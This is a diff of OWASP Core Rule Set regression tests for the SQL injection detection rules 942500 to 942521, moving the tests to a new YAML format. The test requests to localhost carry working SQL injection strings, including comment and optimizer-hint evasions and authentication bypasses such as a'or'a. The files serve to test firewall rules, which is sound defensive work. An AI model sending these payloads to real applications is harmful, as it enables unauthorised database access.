- - test_title: 942500-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?id=9999+or+{if+length((/*!5000select+username/*!50000from*/user+where+id=1))>0}" + version: HTTP/1.0 + output: + log: + expect_ids: [942500] + - test_id: 2 desc: "Use of portability comment (/*!...*/) as evasion technique, with space before !" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?id=9999+or+{if+length((/*+!5000select+username/*!50000from*/user+where+id=1))>0}" - version: HTTP/1.0 - output: - log_contains: id "942500" - - test_title: 942500-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?id=9999+or+{if+length((/*+!5000select+username/*!50000from*/user+where+id=1))>0}" + version: HTTP/1.0 + output: + log: + expect_ids: [942500] + - test_id: 3 desc: "Use of optimizer hints (/*+...*/) as evasion technique" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?test=9999+or+%2F*%2Boptimizer+hint+*%2F+true" - version: "HTTP/1.1" - output: - log_contains: id "942500" - - test_title: 942500-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?test=9999+or+%2F*%2Boptimizer+hint+*%2F+true" + version: "HTTP/1.1" + output: + log: + expect_ids: [942500] + - test_id: 4 desc: "Use of optimizer hints (/*+...*/) as evasion technique with space before +" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?test=9999+or+%2F*+%2Boptimizer+hint+*%2F+true" - version: "HTTP/1.1" - output: - log_contains: id "942500" - - test_title: 942500-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?test=9999+or+%2F*+%2Boptimizer+hint+*%2F+true" + version: "HTTP/1.1" + output: + log: + expect_ids: [942500] + - test_id: 5 desc: "Status Page Test - MySQL inline comment detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?test=9999+or+{if+length((/*!5000select+username/*!comment*/" - version: HTTP/1.0 - output: - log_contains: id "942500" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?test=9999+or+{if+length((/*!5000select+username/*!comment*/" + version: HTTP/1.0 + output: + log: + expect_ids: [942500] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml index ddf211cc7..622884924 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml @@ -1,39 +1,37 @@ --- meta: author: "Franziska Buehler, azurit" - description: None - enabled: true - name: 942510.yaml +rule_id: 942510 tests: - - test_title: 942510-1 + - test_id: 1 desc: "SQLi bypass detected: backticks" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?`bla`" - version: HTTP/1.0 - output: - log_contains: id "942510" - - test_title: 942510-2 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?`bla`" + version: HTTP/1.0 + output: + log: + expect_ids: [942510] + - test_id: 2 desc: "SQLi bypass detected: backticks" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?'bla'" - version: HTTP/1.0 - output: - no_log_contains: id "942510" + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?'bla'" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942510] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml index 9cf2ca3cb..a2096ccbe 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml @@ -1,39 +1,37 @@ --- meta: author: "Walter Hop, azurit" - description: None - enabled: true - name: 942511.yaml +rule_id: 942511 tests: - - test_title: 942511-1 + - test_id: 1 desc: "SQLi bypass detected: quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?`bla`" - version: HTTP/1.0 - output: - no_log_contains: id "942511" - - test_title: 942511-2 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?`bla`" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942511] + - test_id: 2 desc: "SQLi bypass detected: quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?'bla'" - version: HTTP/1.0 - output: - log_contains: id "942511" + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?'bla'" + version: HTTP/1.0 + output: + log: + expect_ids: [942511] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml index 79f614b6a..be7dd030a 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml @@ -2,409 +2,408 @@ meta: author: "terjanq, Franziska Bühler, azurit" description: "Detects basic SQL authentication bypass attempts 4.0/4" - enabled: true - name: 942520.yaml +rule_id: 942520 tests: - - test_title: 942520-1 + - test_id: 1 desc: "Detects basic SQL auth bypass with 'is not something'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=id'is%20not-id--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=id'is%20not-id--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 2 desc: "Negative test: 'is notes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=id'is%20notes" - version: HTTP/1.0 - output: - no_log_contains: id "942520" - - test_title: 942520-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=id'is%20notes" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942520] + - test_id: 3 desc: "Detects basic SQL auth bypass with 'not like something'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=id'not%20like%20id--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=id'not%20like%20id--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 4 desc: "Detects basic SQL auth bypass with 'not glob'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=id'not%20glob-id--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=id'not%20glob-id--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 5 desc: "Detects basic SQL auth bypass with 'not like glob'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=id'not%20glob-id--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=id'not%20glob-id--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 6 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'|email-- - data: "var=x'%7Cemail--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'|email-- + data: "var=x'%7Cemail--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 7 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'-email-- - data: "var=x'-email--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'-email-- + data: "var=x'-email--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 8 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'+email-- (there seem to be a bug with double encoding in tests) - data: "var=x'%252Bemail--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'+email-- (there seem to be a bug with double encoding in tests) + data: "var=x'%252Bemail--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 9 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'^email-- - data: "var=x'%5Eemail--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'^email-- + data: "var=x'%5Eemail--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 10 desc: "Nagive test: Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'@email-- - data: "var=x'%40email--" - version: HTTP/1.0 - output: - no_log_contains: id "942520" - - test_title: 942520-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'@email-- + data: "var=x'%40email--" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942520] + - test_id: 11 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'&email-- - data: "var=x'%26email--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'&email-- + data: "var=x'%26email--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 12 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'email-- - data: "var=x'%3Eemail--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'>email-- + data: "var=x'%3Eemail--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 14 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'=email-- - data: "var=x'%3Demail--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'=email-- + data: "var=x'%3Demail--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 15 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'/email-- - data: "var=x'%2Femail--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'/email-- + data: "var=x'%2Femail--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 16 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'%email-- - data: "var=x'%25email--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'%email-- + data: "var=x'%25email--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 17 desc: "Negative test: Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'~email-- - data: "var=x'~email--" - version: HTTP/1.0 - output: - no_log_contains: id "942520" - - test_title: 942520-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'~email-- + data: "var=x'~email--" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942520] + - test_id: 18 desc: "Detects basic SQL auth bypass with mod" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=x'%20mod%20id--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=x'%20mod%20id--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 19 desc: "Detects basic SQL auth bypass with: sounds like" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='sounds%20like%20rowid--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='sounds%20like%20rowid--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 20 desc: "Bypass with a comment" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='%2F**%2F*2--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='%2F**%2F*2--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 21 desc: "Integration test: 942521 blocks foo'or'oof" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=foo'or'oof" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942520-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=foo'or'oof" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 22 desc: "Integration test: 942522 blocks foo\\''or'oof" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=foo%5c''or'oof" - version: HTTP/1.0 - output: - log_contains: id "942522" - - test_title: 942520-23 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=foo%5c''or'oof" + version: HTTP/1.0 + output: + log: + expect_ids: [942522] + - test_id: 23 desc: "Detect auth bypass email=' is not?--" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=%27%20is%20not%3F--" - version: HTTP/1.0 - output: - log_contains: id "942520" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=%27%20is%20not%3F--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml index 4a119284b..29eec3976 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml @@ -2,410 +2,409 @@ meta: author: "terjanq, Franziska Bühler, azurit" description: "Detects basic SQL authentication bypass attempts 4.1/4" - enabled: true - name: 942521.yaml +rule_id: 942521 tests: - - test_title: 942521-1 + - test_id: 1 desc: "Detects the most basic authentication bypass with 'or'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=a'or'a" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=a'or'a" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 2 desc: "Detects basic SQLite authentication bypass with 'or?'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=a'or?--" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=a'or?--" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 3 desc: "False-positive: Detects or-based authentication bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=is%20this%20your%20parents'%20or%20yours?" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=is%20this%20your%20parents'%20or%20yours?" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 4 desc: "Detects basic SQL auth bypass and-based" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=user'and%20id%20is%20not?--" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 